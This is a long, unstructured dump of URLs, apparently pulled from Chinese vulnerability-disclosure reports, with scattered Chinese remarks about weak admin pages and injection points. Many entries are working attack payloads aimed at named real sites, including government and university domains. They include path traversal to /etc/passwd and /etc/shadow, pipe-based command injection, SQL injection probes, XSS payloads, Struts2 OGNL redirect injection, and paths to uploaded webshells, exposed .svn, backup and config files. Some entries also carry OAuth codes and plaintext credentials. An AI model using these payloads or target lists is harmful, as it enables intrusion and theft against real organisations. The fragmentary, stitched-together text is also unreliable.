http://passport2.pcauto.com.cn/passport2/api/open_oauth.jsp?code=B2F61AFEDABB482FFE7245C7C05FAD08&state=loginBind%3Dhttp%3A%2F%2Fmy.pcauto.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_auto%26return%3Dhttp%3A%2F%2Fmy.pcauto.com.cn%2Fsetting%2Fshare.jsp https://api.weibo.com/2/oauth2/authorize?response_type=code&redirect_uri=http%3A%2F%2Fpassport2.pchouse.com.cn%2Fpassport2%2Fapi%2Fopen_oauth.jsp&state=loginBind%3Dhttp%3A%2F%2Fmy.pchouse.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dsina_house%26return%3Dhttp%3A%2F%2Fmy.pchouse.com.cn%2Fsetting%2Fshare.jsp&client_id=1207940458 passport2.pchouse.com.cn/passport2/api/open_oauth.jsp?state=loginBind%3Dhttp%3A%2F%2Fmy.pchouse.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dsina_house%26return%3Dhttp%3A%2F%2Fmy.pchouse.com.cn%2Fsetting%2Fshare.jsp&code=ae66952a8177151cd58e452e11e4729d http://monitor.jlu.edu.cn/view_ap_png.php?id=nq_jxa2&mode=2 http://kjcg.jlu.edu.cn/ http://kjcg.jlu.edu.cn/pages/kjcgdt/read.aspx?id=7 http://127.0.0.1/install.asp http://www.seebong.com/ResetPassword.aspx http://www.axny.gov.cn/admin/Upfile.asp http://www.coop.ln.gov.cn/yw_info.asp?id=4373 http://gongcheng.gohigh.com.cn/admin http://ovs.iflytek.com/public/change_password?&md1=wffITuct8rJhZ63vwwCRcusSIrrNRho http://www.cetools.cn/index.php/cetools/login http://sanlianbuys.shopex.cn/xxx.php。打开一看,疑似图片马。 http://manager-b2b.shopex.cn/login.php。这是shopex某分销平台下的后台管理系统,光看这个界面就知道管理员对这个页面有多不重视了。 http://sanlianbuys.shopex.cn/info.php http://sanlianbuys.shopex.cn/test.php http://sm.91.com/portal.php http://www.snepb.gov.cn/ldxx.asp?cn=100338&id=3837 http://www.zyshbj.gov.cn进行扫描时 http://www.zyshbj.gov.cn/upload.htm http://192.168.0.250:16788/eyooboard/index.php http://192.168.0.250:16788/apps/1/6/server/setting.php http://www.gsfzb.gov.cn/spplay.asp?ArticleID=88660 http://www.qhqxj.gov.cn/qxyw/list.asp?id=13001 site:bbs.kuaibo.com bbs.kuaibo.com/space-uid-15868974.html http://www.fdjr.net/altfadmin/Login.asp http://www.earthhour.org.cn/solution.php?id=506 http://baozouwushuang.com//index.php?c=ajaxproxy&url=../../../../../../../../../../etc/passwd http://baozouwushuang.com/index.php?c=ajaxproxy&url=index.php http://baozouwushuang.com/index.php?c=ajaxproxy&url=http://www.baidu.com http://www.job51.com/ http://oa.job51.com/ http://www.qszj.gov.cn/ ftp://58.218.199.94/ ftp://job51.com/ ftp://oa.job51.com/ ftp://qszj.gov.cn/ http://www.aituan.com/duobao/1547 http://www.aituan.com/duobao/1547* http://popkart.tiancity.com/webphp/screenshots2/showpic.php?id=158 http://www.youku.com/service/feed/subtype/2/?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112%E2%80%9Casd?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112%27%22%3E%3Ca%3E?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112%E2%80%9Casd?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%27%3E%3Csvg/onload=alert%28document.domain%29%2b%27 http://119.145.255.2:8081 http://119.145.255.2:8081/common/jsp/file.jsp http://agent.baihe.com/login.action http://help.xs8.cn/user_comment.php?action=add http://cq.bnet.cn/hccDocInfoEx.do?action=list http://zj.bnet.cn/lhzxExProdProduct.do?action=showsearchaplist&flag=zjWeb http://www.shcssnet.com.cn/companyweb/index.htm http://www.dongfeng-honda.com/honda_mediaReport.php?nid=604 URL:www.mmwj.gov.cn/gqxx/gq_detail.php?id=2 http://shibada.scnu.edu.cn/wp-admin/ http://shibada.scnu.edu.cn/wp-content/themes/18da/index1.php http://unitown.scnu.edu.cn/ShowMTeachPlanList.php?SelectType=coll&Depart_coll=%B9%E3%B6%AB%CD%E2%D3%EF%CD%E2%C3%B3%B4%F3%D1%A7%%27 pwd:lihh http://book.dahe.cn http://book.dahe.cn/book/content.asp?id=19 http://job.tuniu.com/index/jobs_list http://job.tuniu.com//society/JobInfo/searchJobs?type_id=31 http://bbs.zx.taobao.com/ http://licaike.hexun.com,貌似是和讯网旗下一个产品购买平台 http://licaike.hexun.com/List.action?monthRiseRate=100 http://ggzx.stock.hexun.com/这个站上 http://ggzx.stock.hexun.com/more.jsp?t=2&s=2&k=8350 http://jypx.cdpnet.org/login.aspx http://demo.jypx.cdpnet.org/ http://www.symc.edu.cn/database/PowerEasy5.mdb,并且其中密码过于简单 http://www.chshcms.com/ http://pfd.ceair.com/finhome/index.php?m=member&c=index&a=login&forward=http%3A%2F%2Fpfd.ceair.com%2Ffinhome%2Findex.php http://dealer.zol.com.cn/kindeditor/php/file_manager_json.php?path=/www/ http://dealer.zol.com.cn/kindeditor/php/file_manager_json.php?path=/ http://www.veerchina.com/index.php?r=photoRequest/requestList&orderType=add_time http://www.veerchina.com/index.php?r=photoRequest/requestList&orderType=add_time http://jyxy.swu.edu.cn/down.php?file_name=../../index.php http://www.gantuan.com/review/5573.html http://www.gantuan.com/review/5573*.html http://121.28.41.118:8080 http://calendar.hexun.com这个站点 http://calendar.hexun.com/FData/Default_Day.aspx?date=2014-03-30 https://api.weibo.com/oauth2/authorize?client_id=1705224951&redirect_uri=http%3A%2F%2Flogin.2345.com%2Foauth%2Fbind%2Fweibo_callback&response_type=code&forcelogin=true http://login.2345.com/oauth/bind/weibo_callback?code=c05f66e4ee5e00d26978d47aca52f49d http://wooyun.org/common/uploadFile.jsp http://xxoo.com/common/codewidget.jsp?code=1 http://218.206.27.196:8800/app_chongqing/u004/touch/init.action http://bbs.caipiao.58.com/thread-152934-1-1.html https://graph.renren.com/oauth/authorize?client_id=117231&response_type=code&scope=publish_feed,photo_upload&state=a%3d1%26b%3d2&redirect_uri=http%3A%2F%2Fwww.5sing.com%2FOpenLoginRecive%3Ftype%3D3%26refUrl%3Dhttp%3A%2F%2Fwww.5sing.com%2Fmy%2Fset%2Fbindsns%2F3%3Fcommand%3Dbind&x_renew=true http://www.5sing.com/OpenLoginRecive?type=3&refUrl=http://www.5sing.com/my/set/bindsns/3?command=bind&code=lwz0gikwKpUP3cM8G4eYO28qGSgP0PDf&state=a%3D1%26amp%3Bb%3D2 http://202.121.166.112:8080/ecupl/login.action http://www.btsafety.gov.cn/ http://percent.178.com/getGame.php?type=text&qid=368 http://www.chinanews-info.com/pub/small.do?table=9&type=2&file=../../../../../etc/shadow%00.png http://www.kkfcw.com/jiaoyihelp/list.asp?sort=1 http://www.kkfcw.com/service/index.asp?id=1 http://www.kkfcw.com/news/list.asp?sort=11 http://www.panshi.gov.cn/ http://item.jd.com/1085146.html这个商品,那么加入购物车只需要在地址栏键入http://cart.jd.com/cart/dynamic/gate.action?pid=185146&pcount=1&ptype=1 http://123.126.33.43/.svn/entries http://123.126.33.42/.svn/entries http://123.126.33.209/.svn/entries http://www.sxu.edu.cn/zncs/yjsxy/admin/adminlogin.asp http://www.sxu.edu.cn/zncs/yjsxy/admin/admin.asp http://i5.imgs.letv.com/ajax/.svn/entries http://i5.imgs.letv.com/user/.svn/entries http://cmsv53.xywy.com/mycontrol/cmsmycontrol/login.php http://58.210.91.230:6060 http://www.hyszx.gov.cn http://219.243.39.24/ http://219.243.39.24//wctju3/sds/printSearch.aspx http://219.243.39.24//wctju3/baobiao/jgfpgl_cx.aspx http://wpmv.jx.wo.com.cn/down.jsp?songid=20130507043.mp3 http://www.kcjc.net/uc_server/data/config.inc.php.bak http://item.mop.com/user/myItems.do http://bbs.jiasule.com/forum.php http://partner.gd.chinamobile.com/viewLogin.action http://flv1.vodfile.m1905.com/movie/2014/0X/XX/moivefilename/moivefilename.flv http://www.114menhu.com http://www.weimob.com/Webreserve/DeleteBook http://m.mail.sohu.com的问题。 http://www.gztata.com/tt.asp?id=3 http://www.yedao.com/detail.php?cid=38&pid=32 http://mail.sdta.gov.cn mail.sdta.gov.cn/orgadmin mail.sdta.gov.cn/sysadmin http://www.114menhu.com http://ylc.test.dazhongcai.com/index.php?g=Admin_no_one_konw_cjh&m=Login&a=index http://ylc.test.dazhongcai.com/nongye.php/Admin_no_one_konw_cjh/Login/ http://ylc.test.dazhongcai.com/lvyou.php/Admin_no_one_konw_cjh/Login/ http://ylc.test.dazhongcai.com/lvxingshe.php/Admin_no_one_konw_cjh/Login/ http://121.14.129.111/ http://jifen.qq.com/mall/mall.shtml搜索中输入: http://www.wooyun.org http://pyedf.tju.edu.cn/ http://www.suzhoushilla.com/en/news/?page=2&keys=200&keys_title= http://www.google.de/#filter=0&newwindow=1&q=inurl:GetPassWordByAnswer.aspx http://219.242.65.10/fsweb/CheckTick.aspx?fullname=%e8%af%bb%e8%80%85%e6%9d%a1%e7%a0%81&Login=hmtmmgsa&logintype=BARCODE&password=%e7%99%bb%e5%bd%95%e5%af%86%e7%a0%81&URL=http://www.baidu.com http://library.scac.edu.cn/jpweb/CheckTick.aspx?fullname=%e8%af%bb%e8%80%85%e6%9d%a1%e7%a0%81&Login=hmtmmgsa&logintype=BARCODE&password=%e7%99%bb%e5%bd%95%e5%af%86%e7%a0%81&URL=http://www.baidu.com http://www.gqt.gov.cn/sb.php http://221.181.0.42/ http://218.19.163.121:8080/ntss/ http://218.19.163.121:8080/ntss/login!welcome.action http://ipv6te.bnu.edu.cn/ http://target.com:8081/mem_user.php?action=search&user_login_name=|cat%20/etc/passwd http://target.com:8081/log.php?uname=1|cat%20/etc/passwd%20%3E/tmp/12.txt http://target.com:8081/online_user.php?uname=|cat%20/etc/passwd http://target.com:8081/online_user.php?ip=|uname http://target.com:8081/online_user.php?flux=|id http://target.com:8081/online_user_rad.php?flux=|id http://target.com:8081/show_flux.php?eth=|id%20%3E%20/tmp/22.txt http://shell.cnfol.com/zhidao/getquestion.php?qnum=7&strnum=17&qstatus=ok&var=js&css=6001&cid=14986 http://xjwww.fmmu.edu.cn/D.rar http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 http://net.chinamobile.com/netmeeting/index.html http://bqeyxy.jlu.edu.cn/sql/ http://www.jslegal.com/View.php?ID=118717 http://jobs.china-sss.com,在提交个人简历一块,可以提交附件,为前端文件类型限制,可以抓包突破,上传任意文件,包括网马。 http://mall.china-sss.com/order/orderMessage/2014033143106,想想看是否可以越权查看其他用户的信息呢,试了试,结果是可以的。 http://ccp.sxrc.com.cn/onews.asp?id=143存在 http://edu.nmjxt.com/ http://edu.nmjxt.com/login.asp::$DATA http://edu.nmjxt.com/index.asp::$DATA http://edu.nmjxt.com/conn.asp::$DATA http://www.zj.10086.cn/shop/shop/user/orderQuery/searchOrderById.do?orderId=ff80808144dc40110144df36c5440d96 http://www.zj.10086.cn/shop/shop/user/orderQuery/searchOrderById.do?orderId=ff80808144dc40110144e14c9d2711e2 http://www.zj.10086.cn/shop/shop/user/orderQuery/searchOrderById.do?orderId=ff80808144dc40110144dfd7516d10bf http://wooyun.org/bugs/wooyun-2014-051123 http://bbs.160.com/thread-84876-1-1.html http://bbs.m1905.com/mk.txt http://lm.8864.com/Video/video_show.php?id=9239 http://121.193.130.63:8080/phone/query.do http://www.gsesch.com/Article_Class.asp?ClassID=3&ClassIDIn=1 http://www.rgrcb.com/ site:rgrcb.com http://www.rgrcb.com/manage/Manage_Index.php http://www.rgrcb.com/manage/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.rgrcb.com/manage/fckeditor/editor/filemanager/connectors/php/connector.php https://www.gzekt.com/YoukeAction_youkeLogin.action http://www.nbweekly.com/member/col_memberCenter_register.aspx http://data.ent.people.com.cn/korea_star/getperson.php?id=42'+and+'1'='1 www.baidu.com www.baidu.com www.a.shifen.com www.a.shifen.com www.a.shifen.com http://kyc.gzhmc.edu.cn/editor_new/upload.jsp http://m.miqi.cn/team.php?id=111634 http://m.miqi.cn/list.php?type=cat&id=988&brand_id=344 http://m.miqi.cn/list.php?type=cat&id=988&eff_id=344 http://www.gdzjxf.com/ http://www.gdzjxf.com/php/search.php http://graduate.buaa.edu.cn/TutorInfo.jsp?id=135405 http://www.mysoft.com.cn/sitecn/job_head.aspx?t=1 http://localhost/EasyTalk_X2.5/admin.php?s=/Users/edituser http://tdyw.tju.edu.cn/blog/ http://202.113.13.175/yhvote/vote_detail.php?id=20%27&PHPSESSID=511682211e11dc394882b84f3733c0d2 http://tdyw.tju.edu.cn/news_detail.php?sub=1&id=2812%27 http://tdyw.tju.edu.cn/friends/user/user_detail.php?id=85%27 http://www.ahstgt.gov.cn/ http://www.court.gov.cn/gzhd/gtpt/extension/ http://gest.jlu.edu.cn/admin/login.php http://gest.jlu.edu.cn/pic/2.php http://www.tudou.com/albumplay/UGzxzvdIk3g/RAT-g6mAVtU.html http://www.tudou.com/programs/view/html5embed.action?code=RAT-g6mAVtU http://www.tudou.com/albumplay/0lkeNVDn53g/kriPjgMQM4c.html http://www.tudou.com/programs/view/html5embed.action?code=kriPjgMQM4c https://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=inurl%3A%22gglInfordetail.jsp%22 http://www12.zzu.edu.cn//office/admin/123.php http://www.51ey.com/memberForeAction!toRegister.action?comeSource= http://www.freebuf.com/articles/web/28273.html http://www.yctravel.gov.cn/zhuanti/zhengxianchuangyou/show-news.asp?id=378%27 http://m0.mail.sina.com.cn的问题,通过修改浏览器的User-Agent进行的测试。 http://lcse.lenovo.com.cn/Training/Train/EnterExam.aspx?tID=774&ModuleId=250&type=1# http://lcse.lenovo.com.cn/%5CTraining%5CTrain%5CTrainingList.aspx?type=1&ModuleId=252&ParentModuleId=40 http://blog.cxt8.com/123654/articles http://blog.cxt8.com/123654/Articles/Show/80000000000004D5.html http://blog.cxt8.com///123654/Comment/CommentAdd?parentid=0&pindex=1&content=%u54C7%uFF01%u597D%u8D5E%u597D%u8D5E%u54E6%uFF01%uFF01%uFF01%3CBR%3E&commenttype=101&is_desc=true&keyid=1&callback=jQuery1620412802761401835_1396429516079&_=1396429531578 http://blog.cxt8.com/123654/Comment/CommentAdd?parentid=0&pindex=1&content=%u54C7%uFF01%u597D%u8D5E%u597D%u8D5E%u54E6%uFF01%uFF01%uFF01%3CBR%3E&commenttype=101&is_desc=true&keyid=1&callback=jQuery1620412802761401835_1396429516079&_=1396429531578 http://blog.cxt8.com/ http://dadifeige.mop.com/guangxi/alterUserDetails.do?userId=43 http://jgxy.hpu.edu.cn/printpage.asp?ArticleID=3975 http://www.jntlj.com/ www.114menhu.com商盟系统存在弱口令,客查看所有商户,用户,订单。。。。。等一系列的信息。望紧急修复。 http://lib.hpu.edu.cn/sjk/new/printpage.asp?ArticleID=585 http://mv.wo.com.cn/中国联通沃音乐福建区-点击旧版门户 http://61.241.199.224/index http://61.241.199.224/searchtone?singerName=%B3%C2%B3%FE%C9%F http://218.206.27.196:8080/cqCityAppFM/news/createNewsAction.action存在struts2漏洞 cq.ip66.com/online.php http://www.iweju.com/index.action http://top.chinaz.com/Action/API.aspx?host=www.aa.com http://ext.chrome.360.cn/webstore/detail/fbiaiekikpfpbfjpgplkhlembgbjmffp http://sdk3.doudouy.com/api/users/1 http://www.jxteacher.com/admin/index.aspx http://www.jxteacher.com/Ajax/login.aspx?username=360121026019110153&userpwd=1&resultType=json, http://e.tju.edu.cn/toModule.do?prefix=/News&page=/newsDetail.do?infoid=28480 http://cam.tju.edu.cn/tju/achiev/index.php?id1=10 inurl:sql.php http://www.oei.ytu.edu.cn/phpmyadmin/sql.php?db=tw&table=jos_content&lang=zh_cn&collation_connection=utf8_general_ci&token=06475dfb9dc9ae89e2eae94d57f53bab http://law.inc.hc360.com/finance/Bespeak.aspx?FinId=182678&Factory_Id=&Sale=&Dept_Id=&Area_Id= http://www.3gchina.org/news/show/default.asp?informationid=201309191145125640 http://www.3gchina.org/sitetemplate/wap/index.asp?yp_id=277 http://www.3gchina.org/news/show/?infor_201404030938116950.html这种 http://www.jlsfda.gov.cn/shiyaojiandongtai/news.asp?dm=9094 http://11889.189.cn/portal/ http://11889.189.cn/android/.svn/entries http://11889.189.cn/wap/.svn/entries http://11889.189.cn/download/css/.svn/entries http://11889.189.cn/download/js/.svn/entries http://fc.118100.cn/bbs/ http://fc.118100.cn/bbs/ http://www.china.ccoo.cn/里面的所有网站。随便找到网站的一个用户名,这儿存在用户ID泄露,尽然能够直接看到。 https://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=inurl%3A%22gglInfordetail.jsp%22 site:7daysinn.cn inurl:xls http://www.lsbchina.com/)存在SQL注射可直接注出管理员 http://jingfan.tcl.com/sf/NewsView.asp?id=46 http://gis.tcl.com/gis.rar http://multimedia.tcl.com/tcl.rar http://61.manzuo.com/index.php?s=/Index/topics&id=189 www.maigoo.com http://blog.cnfol.com/ http://mpa.tju.edu.cn/page.php?p=5 bt:/pentest/database/sqlmap# http://mpa.tju.edu.cn/page.php?p=5 http://sqlmap.org http://www.fschina.com/chi/contactus.php?id=1 http://www.fschina.com/phpmyadmin/ http://www.dhlbsc.gov.cn/a/ http://www.kstar.com.cn/cases/ups_xiangxi.aspx?id=14 http://com.demo.powereasy.net/,注册个帐号~~ http://com.demo.powereasy.net/User/Index.aspx,选择信息管理 http://www.laoganma.com.cn/data/ http://www.laoganma.com.cn/images/ http://www.laoganma.com.cn/upload/ http://www.laoganma.com.cn/upload/%3b3.php%3b.jpg http://www.laoganma.com.cn/vote/style.jsp bbs.anguanjia.com/utility/restore.php就可以看到数据备份文件,还支持下载哦。 http://www.shopnctest.com/c2c/2013/demo/ http://www.sipa.sjtu.edu.cn/sdxadmin/login.do http://www.bppa.org.cn/ReadNews.asp?BigClassID=6&SmallClassID=30&SpecialID=0SmallClassName=&BigClassName=&NewsID=8172 http://www.sanfu.com http://www.sanfu.com/test.txt http://www.lnlaw.gov.cn:5200/ https://graph.renren.com/oauth/authorize?client_id=117231&response_type=code&scope=publish_feed,photo_upload&state=a%3d1%26b%3d2&redirect_uri=http%3A%2F%2Fwww.5sing.com%2FOpenLoginRecive%3Ftype%3D3%26refUrl%3Dhttp%3A%2F%2Fwww.5sing.com%2Fmy%2Fset%2Fbindsns%2F3%3Fcommand%3Dbind&x_renew=true http://www.5sing.com/OpenLoginRecive?type=3&refUrl=http://www.5sing.com/my/set/bindsns/3?command=bind&code=lwz0gikwKpUP3cM8G4eYO28qGSgP0PDf&state=a%3D1%26amp%3Bb%3D2 http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=265 http://cam.tju.edu.cn/tju/moreNews.php?viewNum=2&sid=10 https://api.weibo.com/oauth2/authorize?client_id=2043051649&redirect_uri=http://login.tudou.com/xiaonei/connect/activeBack.action&response_type=code&state=2 http://login.tudou.com/xiaonei/connect/activeBack.action?state=2&code=ac331d1522fe37fd7d7ad19e501b8393 http://www.scpta.gov.cn/ http://home.zhcw.com/ http://home.zhcw.com/expert20121210.tar.gz http://www.wuchangzs.com/admin/ http://218.201.202.231:9005/msmp/clientMessageCategoryAction!showList.action http://61.187.87.7/birth/login.action http://www.ecict.com.cn/Newsdetail.php http://www.ecict.com.cn/Newsdetail.php?cid=13&id=158’ http://219.243.39.24/wctju3/ http://219.243.39.24/wctju3/admin_login.aspx http://219.243.39.24/wctju3/Admin.aspx http://121.193.130.63:8080/phone/query.do?method=search&id=101 http://gacfiatauto.hz.letv.com/php/voguserlist.php http://116.228.73.38:8008/sto_ser/部门服务质量管理系统登录 http://116.228.73.38:8008/sto_ser/upload/sf.php http://www.wuchangzs.com/content.php?id=1 http://weipai.baidu.com//photo/likephoto?pid=2 http://10.7.0.19/admin http://cs.cnfol.com/gold/expertPost.html?expertId=6397461&pageNumber=1&pageSize=6&showType=1 http://bbs.zone.jd.com/ http://bbs.zone.jd.com/uc_server/ http://zhan.renren.com/123123111/word/create http://pay.uhuibao.com:8083/SunspeedyPayment/toPayment.action http://210.22.8.98/login.action http://app.renren.com/developers/baseinfo/save suc:true,msg:'成功 http://widget.weibo.com/ http://hui.renren.com/onlineshopping/address/deleteUserAddressConfig http://eoffice8.weaver.cn:8028/login.php http://eoffice8.weaver.cn:8028/building/urlurl.php http://guest.lenovo.com.cn/api/user/point_log.php?uid=2336 http://www.jia.com/citylist/index_deco.php www.jia.com http://www.jia.com http://www.rgrcb.com/readme.txt http://www.rgrcb.com/manage/Manage_Index.php http://go.10086.cn/g/k8cmd.jsp http://219.139.44.218:3000/ http://219.139.44.218:3000/temp/ http://219.139.44.218:3000/temp/cmis/admin/index.asp http://219.139.44.218:3000/temp/cmis/admin/System/dbback/back.asp http://wooyun.org/bugs/wooyun-2013-032545 http://www.google.co.in/#newwindow=1&q=inurl:web_news%2FWebFromList.aspx http://laspzx.linan.gov.cn:8080/ewebeditor/admin/default.aspx http://www.hcggzy.com/ewebeditor/admin/default.aspx http://www.google.co.in/#newwindow=1&q=inurl:web_news%2FWebFromList.aspx http://www.hcggzy.com/public/noteanswer.aspx?txtNoteID=1 http://www.xszbjyw.com:82/public/noteanswer.aspx?txtNoteID=1 http://laspzx.linan.gov.cn:8080/public/noteanswer.aspx?txtNoteID=1 http://www.5eplay.com/group/1/topic/389251?p=0#pub-news http://baike.baidu.com/link?url=G6x2WfNdUdEqb8uOGeqI-NbIleKBZKR70LB4DDkINKSA1uzpJPzeWJoM3sToJN14VUpwkHEQmowx_aQ4cmAPZK http://www.chewen.com/ http://baidu.com http://zfzx.clo.com.cn:8080/reporting/first.do http://202.108.36.116/login.aspx http://202.108.36.89/login.aspx http://www.gz12358.gov.cn/install/index.aspx http://zs.linekong.com/picture.php?sort_id=271&page=2#p=a001这是蓝港某在线某分站,存在sql注入。 http://kyc.chsnenu.edu.cn/administrators/admin_index.asp http://wap.hjsm.tom.com/.svn/entries http://www.syc.com.cn/sys/Article/case/userlist/ http://oa.syc.com.cn/OA/help/HelpShowTip.aspx?helpid=1 http://zjec.mountor.cn/ http://zjec.mountor.cn/license!getExpireDateOfDays.action http://www.pnbs.gov.cn/web!listItem.action?ivo.showtype=bm&ivo.typeimg=/upload/upfiles/20121217/201212171705450.png&ivo.showtypename=%C6%D5%C4%FE%CA%D0%CD%E2%CA%C2%C7%C8%CE%F1%BE%D6&ivo.affairid=&ivo.orgid=DEPARTMENT00001576 http://www.pnbs.gov.cn/upload/upfiles/20140404/201404041806120.jsp http://www.guilinmeijing.com/showzt.php?nid=1 http://quan.sohu.com http://baidu.com http://so.tv.sohu.com/mts?box=1&wd=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&qq-pf-to=pcqq.c2c http://moffice.wo.com.cn/menu_show.php?MenuID=8 http://in.sdo.com/咦这个不是盛大网站么?然后看了下。。又看了wooyun大胖子的帖子后。。结果还是存在一些错误还没修改的嘛。。然后。。。看了下。。WP程序耶!OK。。。后台地址知道了。后台地址: http://in.sdo.com/wp-admin/ http://dynamic.app.m.letv.com/android/dynamic.php?mod=passport&ctl=index&act=getUserByID&uid=10&pcode=010210000&version=5.0 http://112.122.11.156/ http://www.phpapp.cn/index.html http://www.axxfj.gov.cn/manage/Login.asp http://218.201.40.106/wap/ http://www.hanyastar.com/web_us/page/CN2/index.aspx http://183.62.138.14/xmusz/portal!memberLogin.action http://www.scal.com.cn/Scal.WebMaster/News/Accessory/FileDownL.aspx?lins=/&name=./web.config http://www.scal.com.cn/Scal.WebMaster/News/Accessory/FileDownL.aspx?lins=/&name=./App_Data/Config.xml http://www.scal.com.cn/Scal.WebMaster/News/Accessory/FileDownL.aspx?lins=/&name=./App_Data/DbConn.xml http://www1.bsqgs.com:9002/WebRoot/ http://wan.7k7k.com/uploadfiles/userfiles/image/%E7%A5%9E%E6%9B%B2/%E7%8E%A9%E5%AE%B62.jpg http://wan.7k7k.com//uploadfiles/userfiles/image/php.jpg http://content.kefu.189.cn:8005/public/sjkf/hotwords/searchPrompt?&appCode=003&hotWord=1&token=5db9ae9853aabd4f0a388e21a0e9d1ad&deviceOS=android http://waimai.2000tuan.com/waimai/view/get_waimai_by_shopid_and_typeid.php?shop_id=1&page=-1&city_id=31&type_id=4 http://119.145.235.91:8809 site:bbs.lbesec.com inurl:profile http://open.youku.com/docs/api_videos.html#videos-show-basic http://v.youku.com/v_show/id_XNjk0NzIwOTAw.html?f=22126172&ev=2 http://player.youku.com/player.php/sid/XNjk0NzIwOTAw/v.swf http://binzhou.mop.com http://beian.bizcn.com/.svn/entries http://dzbp.wzup.gov.cn/login.aspx http://edu.china-sss.com/ http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://xgb.scu.edu.cn:8088/newsDetail.aspx?id=350155 http://dyactive2.vip.xunlei.com/crystal/?type=init&callback=jsonp1396702220170 http://api.liebao.cn/mars/index.php?r=calendar/weatherwarning网址, http://api.liebao.cn/mars/index.php api.liebao.cn/mars/protected/views/site/index.php api.liebao.cn/mars/protected/views/layouts/main.php http://api.liebao.cn/mars/index.php?r=site/login http://twt.tju.edu.cn/theory/sub_type.php?tid=5&sub_id=62 http://yjs.hnu.cn/zsxt/tmsgl/login.aspx http://113.240.249.181:8080/prjlib/login.xhtml http://www.gantuan.com/shop/review.php http://www.dcbmj.gov.cn/content.asp?id=378 http://www.beescms.com/ http://www2.chinatelecom.com.cn/jobs/index.php?p_id=2&ac=1&j_id=bjsx-12001&i=118 http://www2.chinatelecom.com.cn/jobs/index.php?p_id=2&ac=67&ju_id=bjsx-12001-62680 http://www2.chinatelecom.com.cn/bx2/getfile.php?id=41703 http://www2.chinatelecom.com.cn/jobs/upload/CR-6XyVjyGoY67aaXXGHCRe.php http://hd.jstv.com/xhsy/admin/login.aspx www.ccb.com/sc/20090831_1251709679/sms.xls http://www.cptv.com.cn/ http://haha.sogou.com/submit http://vod_flv.people.com.cn/findMaterialPlayUrlWithToken.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 vod.people.com.cn/mediaUrl.jspa http://vod_flv.people.com.cn/findMaterialPlayUrlWithToken.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 inurl:filemanage.php",即可找到长江网移动智能报刊信息发布云平台的后台管理页面: http://cjmb.cjn.cn/cjnadmin_tmp/web/index.php http://cjmb.cjn.cn/cjnadmin/web/index.php http://post.baidu.com/safecheck/?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX http://wooyun.org http://post.baidu.com/safecheck/?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX http://post.baidu.com/safecheck/?x+Z5mMbGPAu1LJqUU6N6bPwYE5jYY0era3GG37UlS1GBQRtifH7TZhS4jdBDRUK4tRM7J3UHzxJcIcUo5vI27ZYUGRnMkV2TIc30DoYlHCpAMK9WZbvHWHnPwGfiBcHEMDxm7iZ2BjQ= zhushou360://type=apk&name=360影视大全&refer=360se&icon=http://p5.qhimg.com/t0193ee0bd27701a112.png&url=http://softfile.3g.qq.com/msoft/179/1105/91281/qq_4.6.2.2125_android.apk http://www.mdjmu.cn/zsc/admin/adminlogin.asp http://www.dongyingport.gov.cn/articleshow.php?id=6 http://fuwu.myxinnet.com/ http://publish.tju.edu.cn/Logon.do data:password=88952634&user_id=88952634 http://www.17ugo.com/user.php?act=Setnewpassw&username=15652732143 http://www.17ugo.com/app/ http://video.beijing.gov.cn/play.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://vod.sasac.gov.cn/play.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 